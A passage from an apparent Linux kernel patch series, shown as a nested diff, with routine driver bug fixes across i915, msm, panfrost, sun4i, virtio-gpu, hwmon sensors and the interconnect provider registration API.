++	return __active_del_barrier(ref, node_from_active(active));
+ }
+ 
+ int i915_active_add_request(struct i915_active *ref, struct i915_request *rq)
+ {
++	u64 idx = i915_request_timeline(rq)->fence_context;
+ 	struct dma_fence *fence = &rq->fence;
+ 	struct i915_active_fence *active;
+ 	int err;
+@@ -437,16 +437,19 @@ int i915_active_add_request(struct i915_active *ref, struct i915_request *rq)
+ 	if (err)
+ 		return err;
+ 
+-	active = active_instance(ref, i915_request_timeline(rq)->fence_context);
+-	if (!active) {
+-		err = -ENOMEM;
+-		goto out;
+-	}
++	do {
++		active = active_instance(ref, idx);
++		if (!active) {
++			err = -ENOMEM;
++			goto out;
++		}
++
++		if (replace_barrier(ref, active)) {
++			RCU_INIT_POINTER(active->fence, NULL);
++			atomic_dec(&ref->count);
++		}
++	} while (unlikely(is_barrier(active)));
+ 
+-	if (replace_barrier(ref, active)) {
+-		RCU_INIT_POINTER(active->fence, NULL);
+-		atomic_dec(&ref->count);
+-	}
+ 	if (!__i915_active_fence_set(active, fence))
+ 		__i915_active_acquire(ref);
+ 
+diff --git a/drivers/gpu/drm/meson/meson_vpp.c b/drivers/gpu/drm/meson/meson_vpp.c
+index 154837688ab0d..5df1957c8e41f 100644
+--- a/drivers/gpu/drm/meson/meson_vpp.c
++++ b/drivers/gpu/drm/meson/meson_vpp.c
+@@ -100,6 +100,8 @@ void meson_vpp_init(struct meson_drm *priv)
+ 			       priv->io_base + _REG(VPP_DOLBY_CTRL));
+ 		writel_relaxed(0x1020080,
+ 				priv->io_base + _REG(VPP_DUMMY_DATA1));
++		writel_relaxed(0x42020,
++				priv->io_base + _REG(VPP_DUMMY_DATA));
+ 	} else if (meson_vpu_is_compatible(priv, VPU_COMPATIBLE_G12A))
+ 		writel_relaxed(0xf, priv->io_base + _REG(DOLBY_PATH_CTRL));
+ 
+diff --git a/drivers/gpu/drm/msm/msm_gem_shrinker.c b/drivers/gpu/drm/msm/msm_gem_shrinker.c
+index 1de14e67f96b0..31f054c903a43 100644
+--- a/drivers/gpu/drm/msm/msm_gem_shrinker.c
++++ b/drivers/gpu/drm/msm/msm_gem_shrinker.c
+@@ -107,6 +107,7 @@ msm_gem_shrinker_scan(struct shrinker *shrinker, struct shrink_control *sc)
+ 		bool (*shrink)(struct drm_gem_object *obj);
+ 		bool cond;
+ 		unsigned long freed;
++		unsigned long remaining;
+ 	} stages[] = {
+ 		/* Stages of progressively more aggressive/expensive reclaim: */
+ 		{ &priv->lru.dontneed, purge,        true },
+@@ -116,14 +117,18 @@ msm_gem_shrinker_scan(struct shrinker *shrinker, struct shrink_control *sc)
+ 	};
+ 	long nr = sc->nr_to_scan;
+ 	unsigned long freed = 0;
++	unsigned long remaining = 0;
+ 
+ 	for (unsigned i = 0; (nr > 0) && (i < ARRAY_SIZE(stages)); i++) {
+ 		if (!stages[i].cond)
+ 			continue;
+ 		stages[i].freed =
+-			drm_gem_lru_scan(stages[i].lru, nr, stages[i].shrink);
++			drm_gem_lru_scan(stages[i].lru, nr,
++					&stages[i].remaining,
++					 stages[i].shrink);
+ 		nr -= stages[i].freed;
+ 		freed += stages[i].freed;
++		remaining += stages[i].remaining;
+ 	}
+ 
+ 	if (freed) {
+@@ -132,7 +137,7 @@ msm_gem_shrinker_scan(struct shrinker *shrinker, struct shrink_control *sc)
+ 				     stages[3].freed);
+ 	}
+ 
+-	return (freed > 0) ? freed : SHRINK_STOP;
++	return (freed > 0 && remaining > 0) ? freed : SHRINK_STOP;
+ }
+ 
+ #ifdef CONFIG_DEBUG_FS
+@@ -182,10 +187,12 @@ msm_gem_shrinker_vmap(struct notifier_block *nb, unsigned long event, void *ptr)
+ 		NULL,
+ 	};
+ 	unsigned idx, unmapped = 0;
++	unsigned long remaining = 0;
+ 
+ 	for (idx = 0; lrus[idx] && unmapped < vmap_shrink_limit; idx++) {
+ 		unmapped += drm_gem_lru_scan(lrus[idx],
+ 					     vmap_shrink_limit - unmapped,
++					     &remaining,
+ 					     vmap_shrink);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/panfrost/panfrost_mmu.c b/drivers/gpu/drm/panfrost/panfrost_mmu.c
+index 4e83a1891f3ed..666a5e53fe193 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_mmu.c
++++ b/drivers/gpu/drm/panfrost/panfrost_mmu.c
+@@ -282,7 +282,7 @@ static void panfrost_mmu_flush_range(struct panfrost_device *pfdev,
+ 	if (pm_runtime_active(pfdev->dev))
+ 		mmu_hw_do_operation(pfdev, mmu, iova, size, AS_COMMAND_FLUSH_PT);
+ 
+-	pm_runtime_put_sync_autosuspend(pfdev->dev);
++	pm_runtime_put_autosuspend(pfdev->dev);
+ }
+ 
+ static int mmu_map_sg(struct panfrost_device *pfdev, struct panfrost_mmu *mmu,
+diff --git a/drivers/gpu/drm/sun4i/sun4i_drv.c b/drivers/gpu/drm/sun4i/sun4i_drv.c
+index d06ffd99d86e1..7910c5853f0a8 100644
+--- a/drivers/gpu/drm/sun4i/sun4i_drv.c
++++ b/drivers/gpu/drm/sun4i/sun4i_drv.c
+@@ -95,12 +95,12 @@ static int sun4i_drv_bind(struct device *dev)
+ 	/* drm_vblank_init calls kcalloc, which can fail */
+ 	ret = drm_vblank_init(drm, drm->mode_config.num_crtc);
+ 	if (ret)
+-		goto cleanup_mode_config;
++		goto unbind_all;
+ 
+ 	/* Remove early framebuffers (ie. simplefb) */
+ 	ret = drm_aperture_remove_framebuffers(false, &sun4i_drv_driver);
+ 	if (ret)
+-		goto cleanup_mode_config;
++		goto unbind_all;
+ 
+ 	sun4i_framebuffer_init(drm);
+ 
+@@ -119,6 +119,8 @@ static int sun4i_drv_bind(struct device *dev)
+ 
+ finish_poll:
+ 	drm_kms_helper_poll_fini(drm);
++unbind_all:
++	component_unbind_all(dev, NULL);
+ cleanup_mode_config:
+ 	drm_mode_config_cleanup(drm);
+ 	of_reserved_mem_device_release(dev);
+diff --git a/drivers/gpu/drm/ttm/ttm_device.c b/drivers/gpu/drm/ttm/ttm_device.c
+index e7147e3046378..b84f74807ca13 100644
+--- a/drivers/gpu/drm/ttm/ttm_device.c
++++ b/drivers/gpu/drm/ttm/ttm_device.c
+@@ -158,7 +158,7 @@ int ttm_device_swapout(struct ttm_device *bdev, struct ttm_operation_ctx *ctx,
+ 			struct ttm_buffer_object *bo = res->bo;
+ 			uint32_t num_pages;
+ 
+-			if (!bo)
++			if (!bo || bo->resource != res)
+ 				continue;
+ 
+ 			num_pages = PFN_UP(bo->base.size);
+diff --git a/drivers/gpu/drm/virtio/virtgpu_vq.c b/drivers/gpu/drm/virtio/virtgpu_vq.c
+index 9ff8660b50ade..208e9434cb28d 100644
+--- a/drivers/gpu/drm/virtio/virtgpu_vq.c
++++ b/drivers/gpu/drm/virtio/virtgpu_vq.c
+@@ -597,7 +597,7 @@ void virtio_gpu_cmd_transfer_to_host_2d(struct virtio_gpu_device *vgdev,
+ 	bool use_dma_api = !virtio_has_dma_quirk(vgdev->vdev);
+ 
+ 	if (virtio_gpu_is_shmem(bo) && use_dma_api)
+-		dma_sync_sgtable_for_device(&vgdev->vdev->dev,
++		dma_sync_sgtable_for_device(vgdev->vdev->dev.parent,
+ 					    bo->base.sgt, DMA_TO_DEVICE);
+ 
+ 	cmd_p = virtio_gpu_alloc_cmd(vgdev, &vbuf, sizeof(*cmd_p));
+@@ -1019,7 +1019,7 @@ void virtio_gpu_cmd_transfer_to_host_3d(struct virtio_gpu_device *vgdev,
+ 	bool use_dma_api = !virtio_has_dma_quirk(vgdev->vdev);
+ 
+ 	if (virtio_gpu_is_shmem(bo) && use_dma_api)
+-		dma_sync_sgtable_for_device(&vgdev->vdev->dev,
++		dma_sync_sgtable_for_device(vgdev->vdev->dev.parent,
+ 					    bo->base.sgt, DMA_TO_DEVICE);
+ 
+ 	cmd_p = virtio_gpu_alloc_cmd(vgdev, &vbuf, sizeof(*cmd_p));
+diff --git a/drivers/hwmon/adt7475.c b/drivers/hwmon/adt7475.c
+index 51b3d16c32233..6e4c92b500b8e 100644
+--- a/drivers/hwmon/adt7475.c
++++ b/drivers/hwmon/adt7475.c
+@@ -488,10 +488,10 @@ static ssize_t temp_store(struct device *dev, struct device_attribute *attr,
+ 		val = (temp - val) / 1000;
+ 
+ 		if (sattr->index != 1) {
+-			data->temp[HYSTERSIS][sattr->index] &= 0xF0;
++			data->temp[HYSTERSIS][sattr->index] &= 0x0F;
+ 			data->temp[HYSTERSIS][sattr->index] |= (val & 0xF) << 4;
+ 		} else {
+-			data->temp[HYSTERSIS][sattr->index] &= 0x0F;
++			data->temp[HYSTERSIS][sattr->index] &= 0xF0;
+ 			data->temp[HYSTERSIS][sattr->index] |= (val & 0xF);
+ 		}
+ 
+@@ -556,11 +556,11 @@ static ssize_t temp_st_show(struct device *dev, struct device_attribute *attr,
+ 		val = data->enh_acoustics[0] & 0xf;
+ 		break;
+ 	case 1:
+-		val = (data->enh_acoustics[1] >> 4) & 0xf;
++		val = data->enh_acoustics[1] & 0xf;
+ 		break;
+ 	case 2:
+ 	default:
+-		val = data->enh_acoustics[1] & 0xf;
++		val = (data->enh_acoustics[1] >> 4) & 0xf;
+ 		break;
+ 	}
+ 
+diff --git a/drivers/hwmon/ina3221.c b/drivers/hwmon/ina3221.c
+index e06186986444e..f3a4c5633b1ea 100644
+--- a/drivers/hwmon/ina3221.c
++++ b/drivers/hwmon/ina3221.c
+@@ -772,7 +772,7 @@ static int ina3221_probe_child_from_dt(struct device *dev,
+ 		return ret;
+ 	} else if (val > INA3221_CHANNEL3) {
+ 		dev_err(dev, "invalid reg %d of %pOFn\n", val, child);
+-		return ret;
++		return -EINVAL;
+ 	}
+ 
+ 	input = &ina->inputs[val];
+diff --git a/drivers/hwmon/ltc2992.c b/drivers/hwmon/ltc2992.c
+index 72489d5d7eaf9..d88e883c7492c 100644
+--- a/drivers/hwmon/ltc2992.c
++++ b/drivers/hwmon/ltc2992.c
+@@ -323,6 +323,7 @@ static int ltc2992_config_gpio(struct ltc2992_state *st)
+ 	st->gc.label = name;
+ 	st->gc.parent = &st->client->dev;
+ 	st->gc.owner = THIS_MODULE;
++	st->gc.can_sleep = true;
+ 	st->gc.base = -1;
+ 	st->gc.names = st->gpio_names;
+ 	st->gc.ngpio = ARRAY_SIZE(st->gpio_names);
+diff --git a/drivers/hwmon/pmbus/adm1266.c b/drivers/hwmon/pmbus/adm1266.c
+index ec5f932fc6f0f..1ac2b2f4c5705 100644
+--- a/drivers/hwmon/pmbus/adm1266.c
++++ b/drivers/hwmon/pmbus/adm1266.c
+@@ -301,6 +301,7 @@ static int adm1266_config_gpio(struct adm1266_data *data)
+ 	data->gc.label = name;
+ 	data->gc.parent = &data->client->dev;
+ 	data->gc.owner = THIS_MODULE;
++	data->gc.can_sleep = true;
+ 	data->gc.base = -1;
+ 	data->gc.names = data->gpio_names;
+ 	data->gc.ngpio = ARRAY_SIZE(data->gpio_names);
+diff --git a/drivers/hwmon/pmbus/ucd9000.c b/drivers/hwmon/pmbus/ucd9000.c
+index 75fc770c9e403..3daaf22378322 100644
+--- a/drivers/hwmon/pmbus/ucd9000.c
++++ b/drivers/hwmon/pmbus/ucd9000.c
+@@ -7,6 +7,7 @@
+  */
+ 
+ #include <linux/debugfs.h>
++#include <linux/delay.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/of_device.h>
+@@ -16,6 +17,7 @@
+ #include <linux/i2c.h>
+ #include <linux/pmbus.h>
+ #include <linux/gpio/driver.h>
++#include <linux/timekeeping.h>
+ #include "pmbus.h"
+ 
+ enum chips { ucd9000, ucd90120, ucd90124, ucd90160, ucd90320, ucd9090,
+@@ -65,6 +67,7 @@ struct ucd9000_data {
+ 	struct gpio_chip gpio;
+ #endif
+ 	struct dentry *debugfs;
++	ktime_t write_time;
+ };
+ #define to_ucd9000_data(_info) container_of(_info, struct ucd9000_data, info)
+ 
+@@ -73,6 +76,73 @@ struct ucd9000_debugfs_entry {
+ 	u8 index;
+ };
+ 
++/*
++ * It has been observed that the UCD90320 randomly fails register access when
++ * doing another access right on the back of a register write. To mitigate this
++ * make sure that there is a minimum delay between a write access and the
++ * following access. The 250us is based on experimental data. At a delay of
++ * 200us the issue seems to go away. Add a bit of extra margin to allow for
++ * system to system differences.
++ */
++#define UCD90320_WAIT_DELAY_US 250
++
++static inline void ucd90320_wait(const struct ucd9000_data *data)
++{
++	s64 delta = ktime_us_delta(ktime_get(), data->write_time);
++
++	if (delta < UCD90320_WAIT_DELAY_US)
++		udelay(UCD90320_WAIT_DELAY_US - delta);
++}
++
++static int ucd90320_read_word_data(struct i2c_client *client, int page,
++				   int phase, int reg)
++{
++	const struct pmbus_driver_info *info = pmbus_get_driver_info(client);
++	struct ucd9000_data *data = to_ucd9000_data(info);
++
++	if (reg >= PMBUS_VIRT_BASE)
++		return -ENXIO;
++
++	ucd90320_wait(data);
++	return pmbus_read_word_data(client, page, phase, reg);
++}
++
++static int ucd90320_read_byte_data(struct i2c_client *client, int page, int reg)
++{
++	const struct pmbus_driver_info *info = pmbus_get_driver_info(client);
++	struct ucd9000_data *data = to_ucd9000_data(info);
++
++	ucd90320_wait(data);
++	return pmbus_read_byte_data(client, page, reg);
++}
++
++static int ucd90320_write_word_data(struct i2c_client *client, int page,
++				    int reg, u16 word)
++{
++	const struct pmbus_driver_info *info = pmbus_get_driver_info(client);
++	struct ucd9000_data *data = to_ucd9000_data(info);
++	int ret;
++
++	ucd90320_wait(data);
++	ret = pmbus_write_word_data(client, page, reg, word);
++	data->write_time = ktime_get();
++
++	return ret;
++}
++
++static int ucd90320_write_byte(struct i2c_client *client, int page, u8 value)
++{
++	const struct pmbus_driver_info *info = pmbus_get_driver_info(client);
++	struct ucd9000_data *data = to_ucd9000_data(info);
++	int ret;
++
++	ucd90320_wait(data);
++	ret = pmbus_write_byte(client, page, value);
++	data->write_time = ktime_get();
++
++	return ret;
++}
++
+ static int ucd9000_get_fan_config(struct i2c_client *client, int fan)
+ {
+ 	int fan_config = 0;
+@@ -598,6 +668,11 @@ static int ucd9000_probe(struct i2c_client *client)
+ 		info->read_byte_data = ucd9000_read_byte_data;
+ 		info->func[0] |= PMBUS_HAVE_FAN12 | PMBUS_HAVE_STATUS_FAN12
+ 		  | PMBUS_HAVE_FAN34 | PMBUS_HAVE_STATUS_FAN34;
++	} else if (mid->driver_data == ucd90320) {
++		info->read_byte_data = ucd90320_read_byte_data;
++		info->read_word_data = ucd90320_read_word_data;
++		info->write_byte = ucd90320_write_byte;
++		info->write_word_data = ucd90320_write_word_data;
+ 	}
+ 
+ 	ucd9000_probe_gpio(client, mid, data);
+diff --git a/drivers/hwmon/tmp513.c b/drivers/hwmon/tmp513.c
+index 47bbe47e062fd..7d5f7441aceb1 100644
+--- a/drivers/hwmon/tmp513.c
++++ b/drivers/hwmon/tmp513.c
+@@ -758,7 +758,7 @@ static int tmp51x_probe(struct i2c_client *client)
+ static struct i2c_driver tmp51x_driver = {
+ 	.driver = {
+ 		.name	= "tmp51x",
+-		.of_match_table = of_match_ptr(tmp51x_of_match),
++		.of_match_table = tmp51x_of_match,
+ 	},
+ 	.probe_new	= tmp51x_probe,
+ 	.id_table	= tmp51x_id,
+diff --git a/drivers/hwmon/xgene-hwmon.c b/drivers/hwmon/xgene-hwmon.c
+index 5cde837bfd094..d1abea49f01be 100644
+--- a/drivers/hwmon/xgene-hwmon.c
++++ b/drivers/hwmon/xgene-hwmon.c
+@@ -761,6 +761,7 @@ static int xgene_hwmon_remove(struct platform_device *pdev)
+ {
+ 	struct xgene_hwmon_dev *ctx = platform_get_drvdata(pdev);
+ 
++	cancel_work_sync(&ctx->workq);
+ 	hwmon_device_unregister(ctx->hwmon_dev);
+ 	kfifo_free(&ctx->async_msg_fifo);
+ 	if (acpi_disabled)
+diff --git a/drivers/interconnect/core.c b/drivers/interconnect/core.c
+index 25debded65a8f..cfa52c6369d05 100644
+--- a/drivers/interconnect/core.c
++++ b/drivers/interconnect/core.c
+@@ -850,6 +850,10 @@ void icc_node_destroy(int id)
+ 
+ 	mutex_unlock(&icc_lock);
+ 
++	if (!node)
++		return;
++
++	kfree(node->links);
+ 	kfree(node);
+ }
+ EXPORT_SYMBOL_GPL(icc_node_destroy);
+@@ -1029,54 +1033,68 @@ int icc_nodes_remove(struct icc_provider *provider)
+ EXPORT_SYMBOL_GPL(icc_nodes_remove);
+ 
+ /**
+- * icc_provider_add() - add a new interconnect provider
+- * @provider: the interconnect provider that will be added into topology
++ * icc_provider_init() - initialize a new interconnect provider
++ * @provider: the interconnect provider to initialize
++ *
++ * Must be called before adding nodes to the provider.
++ */
++void icc_provider_init(struct icc_provider *provider)
++{
++	WARN_ON(!provider->set);
++
++	INIT_LIST_HEAD(&provider->nodes);
++}
++EXPORT_SYMBOL_GPL(icc_provider_init);
++
++/**
++ * icc_provider_register() - register a new interconnect provider
++ * @provider: the interconnect provider to register
+  *
+  * Return: 0 on success, or an error code otherwise
+  */
+-int icc_provider_add(struct icc_provider *provider)
++int icc_provider_register(struct icc_provider *provider)
+ {
+-	if (WARN_ON(!provider->set))
+-		return -EINVAL;
+ 	if (WARN_ON(!provider->xlate && !provider->xlate_extended))
+ 		return -EINVAL;
+ 
+ 	mutex_lock(&icc_lock);
+-
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	list_add_tail(&provider->provider_list, &icc_providers);
+-
+ 	mutex_unlock(&icc_lock);
+ 
+-	dev_dbg(provider->dev, "interconnect provider added to topology\n");
++	dev_dbg(provider->dev, "interconnect provider registered\n");
+ 
+ 	return 0;
+ }
+-EXPORT_SYMBOL_GPL(icc_provider_add);
++EXPORT_SYMBOL_GPL(icc_provider_register);
+ 
+ /**
+- * icc_provider_del() - delete previously added interconnect provider
+- * @provider: the interconnect provider that will be removed from topology
++ * icc_provider_deregister() - deregister an interconnect provider
++ * @provider: the interconnect provider to deregister
+  */
+-void icc_provider_del(struct icc_provider *provider)
++void icc_provider_deregister(struct icc_provider *provider)
+ {
+ 	mutex_lock(&icc_lock);
+-	if (provider->users) {
+-		pr_warn("interconnect provider still has %d users\n",
+-			provider->users);
+-		mutex_unlock(&icc_lock);
+-		return;
+-	}
+-
+-	if (!list_empty(&provider->nodes)) {
+-		pr_warn("interconnect provider still has nodes\n");
+-		mutex_unlock(&icc_lock);
+-		return;
+-	}
++	WARN_ON(provider->users);
+ 
+ 	list_del(&provider->provider_list);
+ 	mutex_unlock(&icc_lock);
+ }
++EXPORT_SYMBOL_GPL(icc_provider_deregister);
++
++int icc_provider_add(struct icc_provider *provider)
++{
++	icc_provider_init(provider);
++
++	return icc_provider_register(provider);
++}
++EXPORT_SYMBOL_GPL(icc_provider_add);
++
++void icc_provider_del(struct icc_provider *provider)
++{
++	WARN_ON(!list_empty(&provider->nodes));
++
++	icc_provider_deregister(provider);
++}
+ EXPORT_SYMBOL_GPL(icc_provider_del);
+ 
+ static int of_count_icc_providers(struct device_node *np)
+diff --git a/drivers/interconnect/imx/imx.c b/drivers/interconnect/imx/imx.c
+index 823d9be9771a1..979ed610f704b 100644
+--- a/drivers/interconnect/imx/imx.c
++++ b/drivers/interconnect/imx/imx.c
+@@ -295,6 +295,9 @@ int imx_icc_register(struct platform_device *pdev,
+ 	provider->xlate = of_icc_xlate_onecell;
+ 	provider->data = data;
+ 	provider->dev = dev->parent;
++
++	icc_provider_init(provider);
++
+ 	platform_set_drvdata(pdev, imx_provider);
+ 
+ 	if (settings) {
+@@ -306,20 +309,18 @@ int imx_icc_register(struct platform_device *pdev,
+ 		}
+ 	}
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(dev, "error adding interconnect provider: %d\n", ret);
++	ret = imx_icc_register_nodes(imx_provider, nodes, nodes_count, settings);
++	if (ret)
+ 		return ret;
+-	}
+ 
+-	ret = imx_icc_register_nodes(imx_provider, nodes, nodes_count, settings);
++	ret = icc_provider_register(provider);
+ 	if (ret)
+-		goto provider_del;
++		goto err_unregister_nodes;
+ 
+ 	return 0;
+ 
+-provider_del:
+-	icc_provider_del(provider);
++err_unregister_nodes:
++	imx_icc_unregister_nodes(&imx_provider->provider);
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(imx_icc_register);
+@@ -328,9 +329,8 @@ void imx_icc_unregister(struct platform_device *pdev)
+ {
+ 	struct imx_icc_provider *imx_provider = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&imx_provider->provider);
+ 	imx_icc_unregister_nodes(&imx_provider->provider);
+-
+-	icc_provider_del(&imx_provider->provider);
+ }
+ EXPORT_SYMBOL_GPL(imx_icc_unregister);
+ 
+diff --git a/drivers/interconnect/qcom/icc-rpm.c b/drivers/interconnect/qcom/icc-rpm.c
+index 39e43b9575998..6a9e6b563320b 100644
+--- a/drivers/interconnect/qcom/icc-rpm.c
++++ b/drivers/interconnect/qcom/icc-rpm.c
+@@ -506,7 +506,6 @@ regmap_done:
+ 	}
+ 
+ 	provider = &qp->provider;
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	provider->dev = dev;
+ 	provider->set = qcom_icc_set;
+ 	provider->pre_aggregate = qcom_icc_pre_bw_aggregate;
+@@ -514,12 +513,7 @@ regmap_done:
+ 	provider->xlate_extended = qcom_icc_xlate_extended;
+ 	provider->data = data;
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(dev, "error adding interconnect provider: %d\n", ret);
+-		clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+-		return ret;
+-	}
++	icc_provider_init(provider);
+ 
+ 	for (i = 0; i < num_nodes; i++) {
+ 		size_t j;
+@@ -527,7 +521,7 @@ regmap_done:
+ 		node = icc_node_create(qnodes[i]->id);
+ 		if (IS_ERR(node)) {
+ 			ret = PTR_ERR(node);
+-			goto err;
++			goto err_remove_nodes;
+ 		}
+ 
+ 		node->name = qnodes[i]->name;
+@@ -541,17 +535,26 @@ regmap_done:
+ 	}
+ 	data->num_nodes = num_nodes;
+ 
++	ret = icc_provider_register(provider);
++	if (ret)
++		goto err_remove_nodes;
++
+ 	platform_set_drvdata(pdev, qp);
+ 
+ 	/* Populate child NoC devices if any */
+-	if (of_get_child_count(dev->of_node) > 0)
+-		return of_platform_populate(dev->of_node, NULL, NULL, dev);
++	if (of_get_child_count(dev->of_node) > 0) {
++		ret = of_platform_populate(dev->of_node, NULL, NULL, dev);
++		if (ret)
++			goto err_deregister_provider;
++	}
+ 
+ 	return 0;
+-err:
++
++err_deregister_provider:
++	icc_provider_deregister(provider);
++err_remove_nodes:
+ 	icc_nodes_remove(provider);
+ 	clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+-	icc_provider_del(provider);
+ 
+ 	return ret;
+ }
+@@ -561,9 +564,9 @@ int qnoc_remove(struct platform_device *pdev)
+ {
+ 	struct qcom_icc_provider *qp = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&qp->provider);
+ 	icc_nodes_remove(&qp->provider);
+ 	clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+-	icc_provider_del(&qp->provider);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/interconnect/qcom/icc-rpmh.c b/drivers/interconnect/qcom/icc-rpmh.c
+index fd17291c61eb9..fdb5e58e408b4 100644
+--- a/drivers/interconnect/qcom/icc-rpmh.c
++++ b/drivers/interconnect/qcom/icc-rpmh.c
+@@ -192,9 +192,10 @@ int qcom_icc_rpmh_probe(struct platform_device *pdev)
+ 	provider->pre_aggregate = qcom_icc_pre_aggregate;
+ 	provider->aggregate = qcom_icc_aggregate;
+ 	provider->xlate_extended = qcom_icc_xlate_extended;
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	provider->data = data;
+ 
++	icc_provider_init(provider);
++
+ 	qp->dev = dev;
+ 	qp->bcms = desc->bcms;
+ 	qp->num_bcms = desc->num_bcms;
+@@ -203,10 +204,6 @@ int qcom_icc_rpmh_probe(struct platform_device *pdev)
+ 	if (IS_ERR(qp->voter))
+ 		return PTR_ERR(qp->voter);
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret)
+-		return ret;
+-
+ 	for (i = 0; i < qp->num_bcms; i++)
+ 		qcom_icc_bcm_init(qp->bcms[i], dev);
+ 
+@@ -218,7 +215,7 @@ int qcom_icc_rpmh_probe(struct platform_device *pdev)
+ 		node = icc_node_create(qn->id);
+ 		if (IS_ERR(node)) {
+ 			ret = PTR_ERR(node);
+-			goto err;
++			goto err_remove_nodes;
+ 		}
+ 
+ 		node->name = qn->name;
+@@ -232,16 +229,27 @@ int qcom_icc_rpmh_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	data->num_nodes = num_nodes;
++
++	ret = icc_provider_register(provider);
++	if (ret)
++		goto err_remove_nodes;
++
+ 	platform_set_drvdata(pdev, qp);
+ 
+ 	/* Populate child NoC devices if any */
+-	if (of_get_child_count(dev->of_node) > 0)
+-		return of_platform_populate(dev->of_node, NULL, NULL, dev);
++	if (of_get_child_count(dev->of_node) > 0) {
++		ret = of_platform_populate(dev->of_node, NULL, NULL, dev);
++		if (ret)
++			goto err_deregister_provider;
++	}
+ 
+ 	return 0;
+-err:
++
++err_deregister_provider:
++	icc_provider_deregister(provider);
++err_remove_nodes:
+ 	icc_nodes_remove(provider);
+-	icc_provider_del(provider);
++
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(qcom_icc_rpmh_probe);
+@@ -250,8 +258,8 @@ int qcom_icc_rpmh_remove(struct platform_device *pdev)
+ {
+ 	struct qcom_icc_provider *qp = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&qp->provider);
+ 	icc_nodes_remove(&qp->provider);
+-	icc_provider_del(&qp->provider);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/interconnect/qcom/msm8974.c b/drivers/interconnect/qcom/msm8974.c
+index 5ea192f1141dc..1828deaca4432 100644
+--- a/drivers/interconnect/qcom/msm8974.c
++++ b/drivers/interconnect/qcom/msm8974.c
+@@ -692,7 +692,6 @@ static int msm8974_icc_probe(struct platform_device *pdev)
+ 		return ret;
+ 
+ 	provider = &qp->provider;
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	provider->dev = dev;
+ 	provider->set = msm8974_icc_set;
+ 	provider->aggregate = icc_std_aggregate;
+@@ -700,11 +699,7 @@ static int msm8974_icc_probe(struct platform_device *pdev)
+ 	provider->data = data;
+ 	provider->get_bw = msm8974_get_bw;
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(dev, "error adding interconnect provider: %d\n", ret);
+-		goto err_disable_clks;
+-	}
++	icc_provider_init(provider);
+ 
+ 	for (i = 0; i < num_nodes; i++) {
+ 		size_t j;
+@@ -712,7 +707,7 @@ static int msm8974_icc_probe(struct platform_device *pdev)
+ 		node = icc_node_create(qnodes[i]->id);
+ 		if (IS_ERR(node)) {
+ 			ret = PTR_ERR(node);
+-			goto err_del_icc;
++			goto err_remove_nodes;
+ 		}
+ 
+ 		node->name = qnodes[i]->name;
+@@ -729,15 +724,16 @@ static int msm8974_icc_probe(struct platform_device *pdev)
+ 	}
+ 	data->num_nodes = num_nodes;
+ 
++	ret = icc_provider_register(provider);
++	if (ret)
++		goto err_remove_nodes;
++
+ 	platform_set_drvdata(pdev, qp);
+ 
+ 	return 0;
+ 
+-err_del_icc:
++err_remove_nodes:
+ 	icc_nodes_remove(provider);
+-	icc_provider_del(provider);
+-
+-err_disable_clks:
+ 	clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+ 
+ 	return ret;
+@@ -747,9 +743,9 @@ static int msm8974_icc_remove(struct platform_device *pdev)
+ {
+ 	struct msm8974_icc_provider *qp = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&qp->provider);
+ 	icc_nodes_remove(&qp->provider);
+ 	clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+-	icc_provider_del(&qp->provider);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/interconnect/qcom/osm-l3.c b/drivers/interconnect/qcom/osm-l3.c
+index ddbdf0943f94e..333adb21e7176 100644
+--- a/drivers/interconnect/qcom/osm-l3.c
++++ b/drivers/interconnect/qcom/osm-l3.c
+@@ -216,8 +216,8 @@ static int qcom_osm_l3_remove(struct platform_device *pdev)
+ {
+ 	struct qcom_osm_l3_icc_provider *qp = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&qp->provider);
+ 	icc_nodes_remove(&qp->provider);
+-	icc_provider_del(&qp->provider);
+ 
+ 	return 0;
+ }
+@@ -303,14 +303,9 @@ static int qcom_osm_l3_probe(struct platform_device *pdev)
+ 	provider->set = qcom_osm_l3_set;
+ 	provider->aggregate = icc_std_aggregate;
+ 	provider->xlate = of_icc_xlate_onecell;
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	provider->data = data;
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(&pdev->dev, "error adding interconnect provider\n");
+-		return ret;
+-	}
++	icc_provider_init(provider);
+ 
+ 	for (i = 0; i < num_nodes; i++) {
+ 		size_t j;
+@@ -333,12 +328,15 @@ static int qcom_osm_l3_probe(struct platform_device *pdev)
+ 	}
+ 	data->num_nodes = num_nodes;
+ 
++	ret = icc_provider_register(provider);
++	if (ret)
++		goto err;
++
+ 	platform_set_drvdata(pdev, qp);
+ 
+ 	return 0;
+ err:
+ 	icc_nodes_remove(provider);
+-	icc_provider_del(provider);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/interconnect/samsung/exynos.c b/drivers/interconnect/samsung/exynos.c
+index 6559d8cf80687..72e42603823b9 100644
+--- a/drivers/interconnect/samsung/exynos.c
++++ b/drivers/interconnect/samsung/exynos.c
